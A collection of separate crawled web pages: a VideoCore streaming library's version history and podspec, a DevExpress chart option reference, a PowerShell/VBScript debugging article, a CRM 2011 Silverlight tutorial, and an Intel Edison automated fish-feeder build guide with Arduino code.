videocore::rtmp::AACPacketizer : videocore::ITransform mixers/ videocore::IMixer videocore::IAudioMixer : videocore::IMixer videocore::IVideoMixer : videocore::IMixer videocore::AudioMixer : videocore::IAudioMixer iOS/ videocore::iOS::GLESVideoMixer : videocore::IVideoMixer OSX/ videocore::OSX::GLVideoMixer : videocore::IVideoMixer rtmp/ videocore::RTMPSession : videocore::IOutput stream/ videocore::IStreamSession Apple/ videocore::Apple::StreamSession : videocore::IStreamSession Version History - 0.3.1 - Various bugfixes - Introduction of pixel buffer sources so you can add images to broadcast. - 0.3.0 - Improvements to audio/video timestamps and synchronization - Adds an incompatible API call with previous versions. Custom - graphs must now call IMixer::start() to begin mixing. - 0.2.3 - Add support for image filters - 0.2.2 - Fix video streaking bug when adaptative bitrate is enabled - Increase the aggressiveness of the adaptative bitrate algorithm - Add internal pixel buffer format - - 0.2.0 - Removes deprecated functions - Adds Main Profile video - Improves adaptive bitrate algorithm - 0.1.12 - Bugfixes - Red5 support - Improved Adaptive Bitrate algorithm - 0.1.10 - Bugfixes - Adaptive Bitrate introduced - 0.1.9 - Bugfixes, memory leak fixes - Introduces the ability to choose whether to use interface orientation or device orientation for Camera orientation. 
- 0.1.8 - Introduces VideoToolbox encoding for iOS 8+ and OS X 10.9+ - Adds -lc++ for compatibility with Xcode 6 - 0.1.7 - Add a simplified iOS API for the common case of streaming camera/microphone - Deprecate camera aspect ratio and position - Add a matrix transform for Position - Add a matrix transform for Aspect Ratio - Bugfixes - 0.1.6 - Use device orientation for CameraSource rather than interface orientation - 0.1.5 - Add aspect fill to CameraSource - 0.1.4 - Switch from LGPL 2.1 to MIT licensing. - Add Camera preview layer. - Add front/back camera toggle. - Fix aspect ratio bug in Camera source. - 0.1.3 - Update sample app with a more efficient viewport render - 0.1.2 - Fixes a serious bug in the GenericAudioMixer that was causing 100% cpu usage and audio lag. - 0.1.1 - Fixes Cocoapods namespace conflicts for UriParser-cpp - 0.1.0 - Initial CocoaPods version Latest podspec { "name": "VideoCore", "version": "0.3.2", "summary": "An audio and video manipulation and streaming pipeline with support for RTMP.", "description": " This is a work-in-progress library with then intention of being an audio and video manipulationn and streaming pipeline for iOS.n", "homepage": "", "license": "MIT", "authors": { "James Hurley": "[email protected]" }, "source": { "git": "", "tag": "0.3.2" }, "requires_arc": false, "header_dir": "videocore", "header_mappings_dir": ".", "source_files": [ "mixers/**/*.h*", "mixers/**/*.cpp", "mixers/**/*.m*", "rtmp/**/*.h*", "rtmp/**/*.cpp", "rtmp/**/*.m*", "sources/**/*.h*", "sources/**/*.cpp", "sources/**/*.m*", "stream/**/*.h*", "stream/**/*.cpp", "stream/**/*.m*", "system/**/*.h*", "system/**/*.cpp", "system/**/*.m*", "transforms/**/*.h*", "transforms/**/*.cpp", "transforms/**/*.m*", "api/**/*.h*", "api/**/*.m*", "filters/**/*.cpp", "filters/**/*.h*" ], "frameworks": [ "VideoToolbox", "AudioToolbox", "AVFoundation", "CFNetwork", "CoreMedia", "CoreVideo", "OpenGLES", "Foundation", "CoreGraphics" ], "libraries": "c++", "dependencies": { "boost": [ "~> 1.51.0" ], "glm": [ "~> 0.9.4.6" ], "UriParser-cpp": [ "~> 0.1.3" ] }, "xcconfig": { "HEADER_SEARCH_PATHS": "${PODS_ROOT}/boost" }, "platforms": { "ios": "5.0" } } Mon, 29 Feb 2016 05:15:03 +0000
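The architecture overview above boils down to a chain of sources, transforms, and outputs. Purely as an illustration of that pattern, here is a minimal C++ sketch; these are not VideoCore's actual class definitions, just stand-ins named after the ISource/ITransform/IOutput hierarchy listed above.

    #include <cstddef>
    #include <cstdint>
    #include <memory>
    #include <utility>

    struct IOutput {                                  // receives buffers from upstream
        virtual ~IOutput() = default;
        virtual void pushBuffer(const uint8_t* data, std::size_t size) = 0;
    };

    struct ISource {                                  // produces buffers and forwards them downstream
        virtual ~ISource() = default;
        void setOutput(std::shared_ptr<IOutput> out) { m_output = std::move(out); }
    protected:
        std::shared_ptr<IOutput> m_output;
    };

    struct ITransform : IOutput, ISource {};          // both ends: e.g. an encoder or packetizer stage

    struct PassthroughTransform : ITransform {
        void pushBuffer(const uint8_t* data, std::size_t size) override {
            // ...encode / packetize here, then hand the result to the next stage...
            if (m_output) m_output->pushBuffer(data, size);
        }
    };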
https://tryexcept.com/articles/cocoapod/videocore
CC-MAIN-2019-43
en
refinedweb
Contains settings that indicate whether only the Top N series points should be shown in a series, and that define the rule used to determine the Top N points. Declaration (C#): public class TopNOptions : ChartElement Declaration (VB): Public Class TopNOptions Inherits ChartElement The "Top N" feature is intended to visually represent only selected series points of a series, and is determined by the TopNOptions object returned by the SeriesBase.TopNOptions property. This feature is applied only if the SeriesBase.TopNOptions object's Enabled property is set to true. If this feature is enabled, the Mode property determines which property (Count, ThresholdValue or ThresholdPercent) specifies how many series points will be visible in a chart. All other series points are merged into a single "Others" point, which can be visible or hidden according to the ShowOthers property value. The text shown as an argument of the "Others" point is specified by the OthersArgument property. Inheritance: System.Object -> ChartElement -> TopNOptions
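TopNOptions itself belongs to a .NET charting library, but the rule it encapsulates is simple to state in code. The sketch below (illustrative only, and written in C++ rather than the library's language) shows the Count mode: keep the N largest points and, if ShowOthers-style behaviour is wanted, fold the remainder into a single "Others" point; ThresholdValue and ThresholdPercent would merely change the selection test.

    #include <algorithm>
    #include <cstddef>
    #include <string>
    #include <utility>
    #include <vector>

    std::vector<std::pair<std::string, double>>
    TopNWithOthers(std::vector<std::pair<std::string, double>> pts, std::size_t n, bool showOthers)
    {
        std::sort(pts.begin(), pts.end(),
                  [](const std::pair<std::string, double>& a,
                     const std::pair<std::string, double>& b) { return a.second > b.second; });
        if (pts.size() <= n) return pts;

        double others = 0.0;
        for (std::size_t i = n; i < pts.size(); ++i) others += pts[i].second;   // merged points

        pts.resize(n);
        if (showOthers) pts.emplace_back("Others", others);                     // OthersArgument analogue
        return pts;
    }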
https://documentation.devexpress.com/CoreLibraries/DevExpress.XtraCharts.TopNOptions.class
CC-MAIN-2019-43
en
refinedweb
(Note:. You can follow his Windows PowerShell and other system administrator antics at. The first step in troubleshooting this script is to comment out the opening line: #$errorActionPreference = "silentlycontinue" The default value of $errorActionPreference in Windows PowerShell is continue. This means that upon hitting an error, Windows PowerShell will flag the error, but attempt to carry on processing the script. By commenting out the first line, which has changed the value of $errorActionPreference to silentlycontinue, we will be able to troubleshoot what is wrong with the script. If we now run the script again we get the following error: “You cannot call a method on a null-valued expression as seen below.” From the second line of the error, we can see that the issue is with line 4: $Shell.popup($w.UserName) The method is the part of the line after the dot so we know that for some reason the variable $Shell is empty. This is because in line 3, the variable used to store the wscript.shell ComObject has been named $wshShell. So to correct that, line 4 should look like this: $wshShell.popup($w.UserName) If we run the updated script again, we receive the below message box. No error this time, but it is empty. So we know that we can create a message box, but there must be something wrong with populating the text. This is again partly to do with the naming of variables. In line 1, we used $wmi to store the results of the WMI query to retrieve the currently logged-on user. This is the variable we need to use in the popup method to display the correct text. So line 3 should be further corrected: $wshShell.popup($wmi.UserName) However, running the script again still returns an empty message box. Going back to the original WMI query in line 1, if we run it interactively we get the below result: The value of the Name property is the name of the computer, not the logged on user. Also this property is not called UserName, which we are trying to use in line 4. By changing the WMI query to instead use the UserName property, we get the correct logged-on user: Get-WmiObject -Class Win32_computerSystem -Property UserName The corrected script now looks like this: Beginner10_Fixed.ps1 #$errorActionPreference = "silentlycontinue" $wmi = Get-WmiObject -Class Win32_computerSystem -Property UserName $wshShell = New-Object -ComObject wscript.shell $wshShell.popup($wmi.UserName) When we run this corrected script, the following message box is displayed. A slightly more advanced way to create a message box would be to use the message box class within the System.Windows.Forms .NET Framework namespace. While not providing much extra in this particular example, more complex forms could be created using these tools. You first need to load the system.windows.forms assembly (only a subset of the .NET Framework is available by default in Windows PowerShell): [reflection.assembly]::loadwithpartialname('system.windows.forms') | Out-Null Run the same WMI query as before: $wmi = Get-WmiObject -Class Win32_computerSystem -Property UserName Then use the show method of the system.windows.forms.messagebox class to display the message box: [system.Windows.Forms.MessageBox]::show($wmi.username) Beginner Event 10 (VBScript) Georges Maheu is the Premier Field Engineer (PFE) Security Technology Lead for Microsoft Canada. As a Senior PFE, he focuses on delegation of authority (how many domain administrators do you really have?), server hardening, and doing security assessments using his own scripts. 
Georges has a passion for VBScript, Windows PowerShell, and WMI and uses them on a regular basis to gather information from Active Directory and computers. Georges also delivers popular scripting workshops to Microsoft Premier Customers worldwide. ------------ VBScript solution On Error Resume Next Set wmi = GetObject("winmgmts:") colitems = wmi.Execquery("Select user from Win32_computersystem") For Each item In colitem WScript.Echo item.username This is a classic: a script written by someone else without comments. In this situation, the first thing I do after examining the source code is to double-click the script in a test environment. Personally, I use Virtual PC for all my script development and testing. Never run a script in production until you fully and totally understand what it does. Well, running this script did not help. Nothing seems to happen. My next reflex is to comment out the first line and to add the Option explicit statement to force variable declarations: ' On Error Resume Next 'GLM: commented out Option explicit ’GLM: added The apostrophe character is used to add comments or descriptive text in a VBScript. In this case, it will prevent the error-handling statement On error resume next from executing. On error resume next makes your scripts ignore errors (no error messages either) and move on to the next line. I could have deleted the line but I like to keep the original code around while I debug. I also add comments preceded by my initials, GLM. Now, when I run the script, I get this dialog box: As a best practice, all variables should be declared, and adding the Option explicit statement makes this mandatory. Variables are declared with the Dim statement. I add the following: Dim WMI I then repeat the process until all the variables are declared: Dim colItems Dim item During this process, I notice there is a typo in colItem. An s is missing at the end! colItems = wmi.Execquery("Select user from Win32_computersystem") ' For Each item In colItem 'original code For Each item In colItems 'GLM: modified At this point, the code looks like this: ") ' For Each item In colItem 'original code For Each item In colItems 'GLM: modified WScript.Echo item.username And I get the following error message: A search (using Bing) on “vbscript error 800A01C2” may give you an indication of what the problem could be. Fortunately, I found a webpage with a similar problem and remembered that the WMI ExecQuery requires a Set to work: ' colItems = wmi.Execquery("Select user from Win32_computersystem") 'original code Set colItems = wmi.Execquery("Select user from Win32_computersystem") 'GLM: modified Let’s run the code and see what happens. OK, another error. And I thought this was going to be easy. However, line #10 (For Each item In colItems) seems to be fine. One thing you learn quickly when you write or debug scripts is that errors sometimes occur in cascades. If you can’t find anything wrong with a particular line, it could be the error occurred in the code before the line in which the error was reported. The question is, where? WMI, which stands for Windows Management Instrumentation, is in some respect Microsoft’s implementation of WBEM, a standard created by DMTF. WMI uses WQL, a query language similar to SQL. 
Knowing this, I decided to replace the WQL query with the following: ' colItems = WMI.Execquery("Select user from Win32_computersystem") 'original code Set colItems = WMI.Execquery("Select * from Win32_computersystem") 'GLM: modified I did this because the “*” is like a wild card character and will return all the properties associated with the Win32_computerSytem class. Unlike PowerShell, there is no simple way to list properties in VBScript. You could write some code (review Scriptomatic source code for an example), but this would probably be more work than debugging this code! Another option is to use CIM Studio from the free WMI tools. CIM Studio will give you a complete list of all the properties and methods for a given class. With this information, I could also have rewritten the line to: Set colItems = WMI.Execquery("Select userName from Win32_computersystem") Let’s run the script one more time. Yes! It works. Here is the working script after our debugging session: ") 'original code Set colItems = WMI.Execquery("Select * from Win32_computersystem") 'GLM: modified ' For Each item In colItem 'original code For Each item In colItems 'GLM: modified WScript.Echo item.UserName I save this version as a reference and then clean the code. You will notice I removed the On Error Resume Next statement. Because I’m not doing any error handling, there is no point using this statement. Here is the final script with added comments: ShowLoggedUserAccount.vbs '* File: ShowLoggedUserAccount.vbs '* Version: 1.06 '* Date: 2010/04/06 '* Author: Georges Maheu, Microsoft PFE '* '* Based on the original file '* File: VBScriptDoesNotWOrk.vbs '* Version: 1.0 '* Date: 2010/03/21 '* Author: John Doe '* Modifications: documented in file Debug-VBScriptDoesNotWOrk.vbs ' ' This script will display the name of the current logged-on user ' on a local or remote computer ' ================================================================ Option Explicit 'make variable declaration mandatory Dim WMI 'WMI service object Dim colItems 'collection of items returned by WMI query Dim item 'individual item from the WMI collection variable colItems Dim computerName 'name of computer to query 'LocalHost can be replaced by a remote computer name or IP address 'must be run from an account with sufficient permissions to see the data computerName = "localhost" 'create WMI service object and connect to CIMv2 namespace on computerName Set WMI = GetObject("winmgmts:\\"+computerName+"\root\CIMv2") 'retrieve userName property from Win32_computerSystem WMI class set colItems = WMI.Execquery("Select userName from Win32_computersystem") 'WMI ExecQueries returns a SWbemObjectSet collection data structure 'even when there is only one item in the collection. For this reason 'we use the For Each construct to list the userName property For Each item In colItems 'iterate through collection WScript.Echo item.userName 'display user name on screen Just for fun, I also created a very short version of this script: WScript.Echo GetObject("winmgmts:").Execquery("Select * from Win32_computersystem").itemIndex(0).userName Did I read somewhere recently that this syntax: [reflection.assembly]::loadwithpartialname('system.windows.forms') | Out-Null was deprecated in favour of Add-Type? (referenced at the end of the PS section above). Would love to have that link handy for a reference. Perhaps the scripting personages can answer.
https://blogs.technet.microsoft.com/heyscriptingguy/2010/05/28/expert-solutions-beginner-event-10-of-the-2010-scripting-games/
CC-MAIN-2017-34
en
refinedweb
Scenario: for retrieving and updating the data on the Account Form. Requirements: - CRM 2011 - Visual Studio 2010 - CRM 2011 SDK Create a Silverlight Application Step by Step 1. Create a new Silverlight Project: a. Open Visual Studio 2010. b. Click File | New | Project. c. Under Installed Templates, click Visual C# | Silverlight and choose Silverlight Application. Name the project "SilverlightAccountPage". Click OK. d. Click Ok on the next window which will automatically create an Web project to host the Silverlight Application. 2. Add a TextBox and Buttons to the MainPage.xaml page. a. Within Solution Explorer right click on the MainPage.xaml page and choose View Designer. b. Click View|Toolbox. When the toolbox window opens click the pin icon to keep the window open. c. Find the TextBox control within the Toolbox window. Drag the TextBox control onto the MainPage.xaml. This creates a single Textbox on the page. d. Right click the TextBox control and choose Properties. The properties window will display on your right hand side. e. At the top of the Properties window change the name to txtAccountName. f. Find the Button control within the Toolbox window. Drag the Button control onto the MainPage.xaml page under the textbox. This creates a single Button on the page. g. Right click the Button control on the MainPage.xaml page and choose Properties. The properties window will display on your right hand side. h. At the top of the Properties window change the name to btnUpdateData and update the Content property to “Update Data”. i. Add one more button to the page with the name of btnSaveData and Content property of “Save Data”. 3. Add code to the Button’s Click Event. a. Double-Click the Set Data Button control on the MainPage.xaml page. This will take you to the MainPage.xaml.cs file where we can see the btnSetData_Click method. b. Add the following code within the btnSetData_Click code method. This updates the name attribute on the Account form. private void btnSetData_Click(object sender, EventArgs e) { //Update Account Name attribute on the form. dynamic xrm = (ScriptObject)HtmlPage.Window.GetProperty("Xrm"); xrm.Page.data.entity.attributes.get("name").setValue(txtAccountName.Text); } c. Double-Click the Save Data Button control on the MainPage.xaml page. This will take you to the MainPage.xaml.cs file where we can see the btnSaveData_Click method. d. Add the following code within the btnSetData_Click code method. This fires the save action similar to Save button on the form. private void btnSaveData_Click(object sender, EventArgs e) { //Fire Save method to commit form changes. dynamic xrm = (ScriptObject)HtmlPage.Window.GetProperty("Xrm"); xrm.Page.data.entity.save() } e. Add the following code within the MainPage method. This retrieves the current account name value when the page is loaded. public void MainPage() { InitializeComponent(); //Populate textbox with current account name value. dynamic xrm = (ScriptObject)HtmlPage.Window.GetProperty("Xrm"); txtAccountName.Text = xrm.Page.data.entity.attributes.get(“name”).getValue(); } 4. Add the Microsoft.CSharp assembly as reference. a. Locate the Solution Explorer, right-click References and choose Add Reference. b. In the Add Reference browser window, click the .NET tab. c. Choose Microsoft.CSharp, and click OK. d. Add the following using statements at the top of the Default.aspx.cs file. using System.Windows.Browser; e. The completed code should look similar to the following. 
using System; using System.Collections.Generic; using System.Linq; using System.Net; using System.Windows; using System.Windows.Controls; using System.Windows.Documents; using System.Windows.Input; using System.Windows.Media; using System.Windows.Media.Animation; using System.Windows.Shapes; using System.Windows.Browser; namespace SilverlightAccountPage { public partial class MainPage : UserControl { public MainPage() { InitializeComponent(); //Populate textbox with current account name value. dynamic xrm = (ScriptObject)HtmlPage.Window.GetProperty("Xrm"); txtAccountName.Text = xrm.Page.data.entity.attributes.get("name").getValue(); } private void btnSetData_Click(object sender, RoutedEventArgs e) { //Update Account Name attribute on the form with value from textbox. dynamic xrm = (ScriptObject)HtmlPage.Window.GetProperty("Xrm"); xrm.Page.data.entity.attributes.get("name").setValue(txtAccountName.Text); } private void btnSaveData_Click(object sender, RoutedEventArgs e) { //Fire Save method to commit form changes. dynamic xrm = (ScriptObject)HtmlPage.Window.GetProperty("Xrm"); xrm.Page.data.entity.save(); } } } f. Click Build|Build Solution. If everything is correct you will see it say Build Succeeded at the bottom of the Visual Studio Window. 5. Create the Silverlight Web Resource. a. Log into the CRM Website and navigate to Settings | Customizations | Customize the System. b. In the Solution Window Click Web Resources from the Components list on the left hand navigation. c. Click New. d. Populate the new Web Resource information. Name: /ClientBin/SilverlightAccountPage.xap Display Name: Silverlight Account Page Description: Silverlight Application that interacts with Account Form. Type: Silverlight (XAP) Language: English e. Click Save. f. Click the Browse Button and select the XAP file that was built within Visual Studio. Path may be similar to the following. i.e. C:\Users\<UserName>\Documents\Visual Studio 2010\Projects\Silverlight AccountPage.Web\ClientBin. g. Save the Web Resource. 6. Add Silverlight Web Resource to the Account Form. a. Log into the CRM Website and navigate to Settings | Customizations | Customize the System. b. In the Solution Window Expand Entities from the Components list on the left hand navigation. c. Expand Account from within the Entities List. d. Select Forms and Open the Main Form. e. Click the Insert Tab at the top of the form and choose Web Resource. f. Use the lookup to select the Silverlight web resource that we created in Step 5. g. Enter a Name and Label for the Web Resource and Click OK. h. Click Save on the Account Form. i. Click Publish on the Account Form. j. Open an Existing Account record from the Account view. The Silverlight web resource will be displayed once the Account Form opens. k. Change the Account name within the web resource textbox and click Set Data. The new name will be reflected on the form. l. Click the Save Data button and this will commit the change and refresh the form. You can find more information regarding related services we provide here. Great post Jeremy. 🙂 Thanks a lot. I was looking for example of the simple SilverLight Application. And It works fine. Thanks … i also was searching for steps to create a web resource in CRM 2011 this helps a lot It was working fine.bt when try to put that xap file in html it was not working? Please tell me the reason.. Can u please tell me how i display data from one account to xap hosted html web resources when i click on a button in ribbon of that account. 
https://blogs.msdn.microsoft.com/crminthefield/2011/06/23/how-to-create-a-silverlight-web-resource-that-interacts-with-crm-2011-forms/
CC-MAIN-2017-34
en
refinedweb
Things used in this project Story Looking after two aquariums isn't an easy job, especially for someone as forgetful as me. Sometimes, I'd forget to feed the fishies for several days until my mom would notice floating fish skeletons. Well, nowadays that never happens, because of the new AquaFeeder2.0 - a machine that feeds the fishes all by itself! Yes, AquaFeeder is fully automated; all you have to do is leave it on 24/7, and it will automatically feed the fish twice a day. It does everything on its own, from opening and closing the aquarium lid, to dropping fish food. It also keeps you updated with the details of the aquarium and itself through a webpage that can be accessed by any phone, tablet or computer on your WiFi network. AquaFeeder is a great machine that you could use if: - You are forgetful (like me) - You are busy and working all the time (like me) - You are on vacation and need to feed the fish when you aren't there. - You want the best care for your fishes. - You like making stuff instead of buying them (yeah, the true maker spirit \m/) This isn't actually my first ever automated fish feeder; I made AquaFeeder1.0 about 6 months ago (check out its instructable too!). Unfortunately, AquaFeeder 1.0 desperately needed a serious upgrade. You couldn't really be sure if it actually fed the fish at a particular time or it failed to do so. It also needed some user interface which could allow someone to access it remotely. AquaFeeder2.0 took care of those problems; it is equipped with the (incredibly powerful) Intel Edison, it now has inbuilt WiFi and Bluetooth and compatibility with several programming languages that unleashes a huge number of possibilities. Here are some of AquaFeeder 2.0's new features: - WiFi connectivity: Get data from AquaFeeder or control it through a webpage. - Email notifications: Sends you an email when it successfully feeds the fish. - WiFi synced time. With these features along with a better CPU and program, AquaFeeder is now closer to being a commercial product than a prototype. The bottom line: AquaFeeder2.0 is a vastly improved automated fish feeder that regularly feeds the fish all by itself, while using the sophisticated features of the Intel Edison to keep the user up to date with info about the aquarium and fish. Wanna see how exactly AquaFeeder works? Keep reading below! Step 1: How AquaFeeder Works... AquaFeeder's main job, simply put, is to feed the fish. For a machine, this actually isn't as simple as it sounds. How does AquaFeeder2.0 feed the fish? AquaFeeder has 2 user-set feeding times, which means it feeds the fishes twice a day. Whenever it's time to feed, one servo motor opens the aquarium lid, another servo drops the fish food into the water, and then the lid is closed again. Video: This video shows how AquaFeeder feeds the fish using its servo motors. The LCD display: When not feeding the fish, AquaFeeder's LCD displays the web synced time and it's IP address. The time to feed next and the previous time fed are also figured out and displayed on the LCD display for the user's convenience. OTHER FEATURES:- WiFi and Webpage: Using your browser (like Google Chrome or Safari), you can access AquaFeeder through a webpage. On this webpage, you can view details, such as the time to feed the fish next, the time previously fed etc. You can also set custom feeding times or tell AquaFeeder to feed the fish right now. 
Web Synced Time: The Edison obtains the current time from the NTP server (one of the many official time servers where computers and other IoT devices sync their time with). This is very convenient as you don't have to keep setting the time manually. This picture below gives a brief of how the Edison synchronises the time with the Internet using NTP (network time protocol). As shown above, the LCD displays the time and IP address. Step 2: About AquaFeeder 2.0 What's new in AquaFeeder 2.0? - Better automation: AquaFeeder 1.0 was an automated machine, but there were many problems. For example, 1 out of 8 times the feeding program would fail and the fish wouldn't be fed, maybe due to power loss or unusual behaviour of the servo motor. Also, it couldn't figure out if it had missed feeding the fish, or if it was off during the feeding time. AquaFeeder 2.0 has a better feeding algorithm that wouldn't let the servo motor take too large amounts of current. Even if it fails feeding completely due to a power failure, when it is switched on again, the program will feed the fish immediately after booting up. - Easier To Use: AquaFeeder 2.0 has a simple alphanumeric LCD screen (instead of a graphic LCD) which displays all important information at one glance. In the picture below AquaFeeder's LCD is showing the next time to feed and the time previously fed. The LCD screen showing the time to feed the fish next, and the time previously fed... There are no buttons to fiddle around with. AquaFeeder is entirely controlled through the webpage on the local WiFi network, so anyone can access it from any place in the house on any device with considerable ease. - Better lid opening mechanism: Now much more sturdy, without the mess of double tape. - Powerful On-board Computer: The Intel Edison doesn't just run Arduino code, but can also run Python, C, and Node.js. In English, it simply means that it's MUCH more powerful and sophisticated than AquaFeeder1.0. - Control AquaFeeder from any device, anywhere! - You can view details and set feeding times for AquaFeeder through a webpage on the local WiFi network! - See the tags on the images above to see the differences between AquaFeeder 1.0 and 2.0 side by side. Step 3: Project Materials and Details... Time Required: 2 weekends, if you work fast enough Cost: ~$120-$130 (including the Edison Arduino breakout board) Difficulty: Hard (9/10) Skills Required: - Programming with Arduino (and general programming know-how) - Using Linux Command Line (even a little experience is sufficient) - Electronics - Making stuff out of paper and cardboard (strong sturdy stuff, not art and craft) Materials For Electronics: - Intel Edison Arduino Breakout Board - 1 standard servo motor - 1 micro servo motor - 16x2 alphanumeric LCD screen - Breadboard shield - 2N2222 transistors (2) - Buzzer - Jumper wire - WiFi antenna (optional) Materials for Stand: - Mountboard (white cardboard) - Firm double layer cardboard - Ice cream sticks - PVA glue - Superglue - Small nail - Double Tape - 2 part adhesive (like Araldite or Bondtite) Step 11: Attach The Servo To The Lid... Attach a strong piece of string to the Micro Servo Motor and fix it just behind the lid's hinge (as shown above). I've used super strong 2 part adhesive which is way cleaner than nasty double tape. 
After the glue dries, stick the other end of the string to the lid (see 1st picture) with a combination of insulation tape and super strong adhesive (see picture 3). Step 12: Prepare The Intel Edison... Prerequisites: Before continuing with this project, you should have done the following for thee Edison: - Installed all drivers on the computer - Installed the Arduino IDE - Flashed linux image onto the Edison. - Established a serial connection with the Edison and connected it to WiFi - Downloaded Putty and WinSCP After following these basic getting started instructions, be sure to follow the following steps if you haven't already: - Open a serial connection with the Edison using Putty. - Enter this command: vi /etc/opkg/base-feeds.conf - Now type in: src/gz all src/gz edison src/gz core2-32 - Now hit the escape key and type :wq - Type in opkg update. - Yay thats done! You can install many programs, like nano (a much more user friendly test editor that vi). Just run opkg install nano and it should download and install on its own. This page helped me with getting these instructions. Step 13: Prepare The LCD Screen... I simply connected a bunch of jumper wires to the required pins of the LCD screen. On the other ends of the wires I soldered on make headers (see pic above) so that they'd easily connect to the headers on the Edison breakout board). Note: Be sure to mark which wire is which in order to avoid confusion later on! Wires to be connected to Edison: D4, D5, D6, D7, RS, E (aka enable pin) [leave one end of these unconnected for now!] Other connections: - R/W pin to ground. - 1K resistor resistor between VEE (also labeled V0 sometimes) and ground - LED+ to +5V through 220ohm resistor - LED- to ground. Step 14: The Circuit... Now to the fun part - the circuit. The circuit consists of: - 2 Transistors, controlling the servo motors' signal - A buzzer. - An alphanumeric LCD screen (the green made-in-china ones) I've arranged my circuit on a home-made breadboard shield, though you use a plain old half breadboard from SparkFun. Follow the pictures above to make the circuit... Note that the motors only have to be connected later on... Step 15: Arduino Code + some more programming... The Arduino code is long. 800+ lines of code for me is flabbergasting! Anyway, the zipped folder is available below. Simply download it, unzip it and open it with the Arduino IDE. Before uploading to the Edison, follow these instructions: - Open a connection to the Edison using WinSCP. - Right click and create a file named "arduino" - In the file, enter this - 12,30,0,19,0,0,22,51,22,19,0,0,6,0,0 - Now save this file. - Make another file called "text.htm" and insert the text from the file below called "text.htm": Also, go the the line before void setup() where the WiFi ssid and password have been declared. Changed these according to your network, and then upload the Arduino sketch to the Edison. Go on to the next step to test AquaFeeder! Download the zipped Arduino code here! Step 16: How The Arduino Code Works... Most of you wouldn't want to go through the entire code to try and figure out how it works and where each section of code, especially because there are 800+ lines of code (a LOT for a noob like me). 
So here is a brief overview of how the Arduino code of AquaFeeder 2.0 executes: void setup(){ //the setup part is run only once, immediately after the program begins - Begin serial connection at 115200 baud - Begin LCD and show the AquaFeeder 2.0 splash screen - Attempt to connect to the WiFi network - Begin a server on port 88 - Show details of WiFi on the LCD and serial port - Obtain web time using NTP - Get variables like feeding times, previous time fed etc. from the "arduino" text file under /home/root/ on the Edison - Check if any feeding time has been missed, and if it has, then start feeding the fish - Figure out the time to feed next - Set servo motors to their initial position } void loop(){ //the loop runs over and over again after the setup() - Listen for web clients (meaning, be ready to serve a webpage when someone requests it from a browser on their computer) - Display different information on the LCD alternately: the current time and IP address, then the next time to feed and the time previously fed, every few seconds - Attempt to get web-synced time if it failed to do so earlier - Compare the current time and feeding times and determine if it is time to feed the fish - If it is time to feed the fish, carry out the feeding with the function feedfish(); } void feedfish(){ //A function which includes all activities carried out when it is time to feed - Create a sound with the buzzer - Show "Opening Lid" on the LCD and start opening the lid using the servo motor on pin 3 - Rotate the feeding servo (connected to pin 2) halfway to shake the fish food container so that fish food falls into the water - Rotate the feeding servo motor back into the initial position - Use the lid servo to close the lid - Update the previously fed and next-to-feed times - Send an email with the necessary information - Update the file "arduino" under /home/root/ on the Edison } Step 17: Testing Edison (without attaching motors... yet) Checking if the LCD works and the Edison connects to WiFi: Open the serial monitor in the Arduino IDE. After the sketch uploads, you should see the LCD display show "AquaFeeder" along with a loading sign. After that it will attempt to connect to your WiFi network (so be sure that your router is always on!). If it connects successfully, the LCD will display the Edison's IP address, while the serial port will show other WiFi details like signal strength. Checking if the Edison successfully gets web-synced time and obtains variables from the "arduino" text file: Now, the Edison will make an attempt to get the time from the NTP server. If it succeeds, it will send the current time to the serial port and display it on the LCD. The Edison will then open the "arduino" file (which we made earlier) and read the number variables off it, then determine the feeding times, previous time fed, previous day fed etc. After all this happens, the Edison will go through the main loop(); the LCD will switch between showing the current time and IP address or the next time to feed and previous time fed every few seconds. On the serial monitor you should see the message "Listening to clients". This refers to the Edison's webpage. Testing Edison's webpage: Now, on your computer, type the Edison's IP address followed by :88/h into your browser. For example, if the Edison's IP address is 192.168.1.12, type in 192.168.1.12:88/h. Look at the serial port now. You should see the message "GOT CLIENT!" and some other messages after that. In your browser, you should see a webpage load that looks like this: (If you'd rather check that the page is being served from a script instead of a browser, see the sketch just below.)
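You can also test the Edison's web server with a short Python script running on your computer. The snippet below is only an illustrative sketch and isn't part of the AquaFeeder code; the address 192.168.1.12 is just an example, so substitute the IP address shown on AquaFeeder's LCD.

import sys
from urllib.request import urlopen

# Example address only: replace with the IP address shown on the LCD.
EDISON_URL = "http://192.168.1.12:88/h"

try:
    # Request the same page the browser would load and print the raw HTML.
    with urlopen(EDISON_URL, timeout=10) as response:
        print(response.read().decode("utf-8", errors="replace"))
except OSError as error:
    # Covers connection errors and timeouts (URLError is a subclass of OSError).
    sys.exit(f"Could not reach AquaFeeder at {EDISON_URL}: {error}")

If the script prints the AquaFeeder status page, the web server is working, and you should see the same "GOT CLIENT!" message on the serial monitor.

Step 18: Making An Enclosure...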
I'm lazy, unimaginative, out-of-time and lack a 3D printer, so I had to end up with an enclosure made from the box the Intel Edison came in. Well at least the box looks better than the origami box I tried making earlier (which failed MISERABLY), and I can still use it to store my Edison if I like. How you cut up your box is up to you; just keep in mind that the headers should be accessible and preferably the USB and DC connectors too. Step 19: Connect The Servos... It's time to move the AquaFeeder stand to the aquarium! I had to extend the servo wires so that it could reach the Edison that was placed at the base of the stand. To connect the servo motors, see the Fritzing diagram above. Step 20: Connect to Power and Test! I used a 12V adaptor to power my Edison through the DC power jack. After the Edison is powered up and the LCD is showing the time/IP address (i.e its in the main loop sequence), connect to the Edison's webpage (see Step 17). Click on the feed now link. After a few moments, you should here a few beeps, and some messages on the serial port that indicate that AquaFeeder is going to start feeding the fish. AquaFeeder will first start opening the lid, while the LCD shows "Opening Lid". Then the other servo motor will rotate and jerk a bit and then return to its initial position. After that, the lid will be closed. Check your connections if either or both servos are not working! After the feeding algorithm is completed, the LCD must show the previous time fed correctly too. Also in your browser, hit the back button to prevent running the feeding algorithm again! Step 21: Finished! If all tests worked great, you can now attach the fish food container to the feeding servo as shown above. And AquaFeeder is finished! All you have to do is leave it on the entire day, and it'll take care of the rest! Schematics Code Code snippet #1Plain text src/gz all src/gz edison src/gz core2-32 Code snippet #2Plain text //WiFI variablesint status = WL_IDLE_STATUS; char ssid[] = "your network name"; //your network SSID (name) char pass[] = "your*network*pass****"; // your network password WiFiServer server(88); AquaFeeder2.inoArduino //#include <Wire.h> #include <LiquidCrystal.h> #include <Time.h> #include <WiFi.h> #include <WiFiUdp.h> #include "textreader.c" #include <SoftwareServo.h> //#include <Intel_Edison_BT_SPP.h> LiquidCrystal lcd(6, 7, 8, 9, 10, 11); 